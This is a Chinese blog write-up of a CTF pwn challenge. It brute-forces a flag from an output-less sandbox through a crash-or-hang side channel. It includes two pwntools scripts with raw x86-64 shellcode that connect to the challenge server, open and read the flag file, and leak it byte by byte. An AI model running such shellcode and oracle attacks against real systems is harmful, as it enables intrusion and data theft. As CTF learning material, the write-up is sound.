Loading... 这题没啥意思,就是爆破。由于无法输出任何东西,需要有能代表是正确的标志,可以使用 jmp 0 的方法,如果爆破正确则 jmp 0,否则 jmp 到一个乱七八糟的地方造成段错误,这样通过是否有 got eof 就可以判断了。 使用 shellcraft 可以获得 shellcode ```python shellcode = asm(shellcraft.amd64.syscall('SYS_open',0x10000 + 0x30,0).rstrip()) shellcode += asm(shellcraft.amd64.syscall('SYS_read',3,0x10500,40).rstrip()) shellcode += asm("cmp rax,12") shellcode += "\x75\x02" # jne 2 shellcode += "\xeb\xfe" # jmp 0 shellcode = shellcode.ljust(0x30,'a') shellcode = asm(shellcraft.amd64.pushstr("/home/pwn/flag")) ``` ```python #!/usr/bin/env python # coding=utf-8 from pwn import * import struct context.log_level = 'debug' context.arch = "amd64" context.terminal = ["tmux","splitw","-h"] for i in range(18,19): sh = remote("8.140.177.7",40334) #sh = process("./chall") shellcode = "\x6a\x02\x58\xbf\x01\x01\x02\x01\x81\xf7\x31" shellcode += "\x01\x03\x01\x31\xf6\x0f\x05\x31\xc0\x6a\x03" shellcode += "\x5f\x6a\x28\x5a\xbe\x01\x01\x02\x01\x81\xf6" shellcode += "\x01\x04\x03\x01\x0f\x05\x48\x83\xf8" shellcode += struct.pack("B",i) shellcode += "\x75\x02\xeb\xfe\x61" #shellcode += "\x2f\x68\x6f\x6d\x65\x2f\x70\x77\x6e\x2f\x66\x6c\x61\x67\x00" shellcode += "../pwn/flag" log.success(str(i)) sh.sendafter("box.\n",shellcode) sh.interactive() sh.close() ``` 通过这个脚本可以获得 flag 的长度,同时也可以套出一个更短的访问 flag 的路径 "../pwn/flag",然后进行之后对 flag 内容的爆破,脚本如下 ```python #!/usr/bin/env python # coding=utf-8 from pwn import * import struct context.terminal = ["tmux","splitw","-h"] context.log_level = 'debug' liter = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=> flag = "flag{k33p_qu14t" #for i in range(4,18): for j in range(0,len(liter)): try: sh = remote("8.140.177.7",40334) #sh = process("./chall") shellcode = "\x6a\x02\x58\xbf\x01\x01\x02\x01\x81\xf7\x34" shellcode += "\x01\x03\x01\x31\xf6\x0f\x05\x31\xc0\x6a\x03" shellcode += "\x5f\x6a\x28\x5a\xbe\x01\x01\x02\x01\x81\xf6" shellcode += "\x01\x04\x03\x01\x0f\x05\x8a\x04\x25" shellcode += p32(0x10500 + 15) shellcode += "\x3C" shellcode += struct.pack("B",ord(liter[j])) #shellcode += struct.pack("B",ord('q')) shellcode += "\x75\x02\xeb\xfe\x61\x2e\x2e\x2f\x70\x77\x6e\x2f\x66\x6c\x61\x67" log.success(liter[j]) #log.success(flag[j]) sh.recvuntil("Welcome") #gdb.attach(proc.pidof(sh)[0]) sh.sendafter("box.\n",shellcode) #sh.recvuntil(EOF) sh.interactive() except: sh.close() ``` 最后得出 flag:`flag{k33p_qu14t!}` 最后修改:2021 年 04 月 29 日 © 允许规范转载 打赏 赞赏作者 支付宝微信 赞 0 如果觉得我的文章对你有用,那听听上面我喜欢的歌吧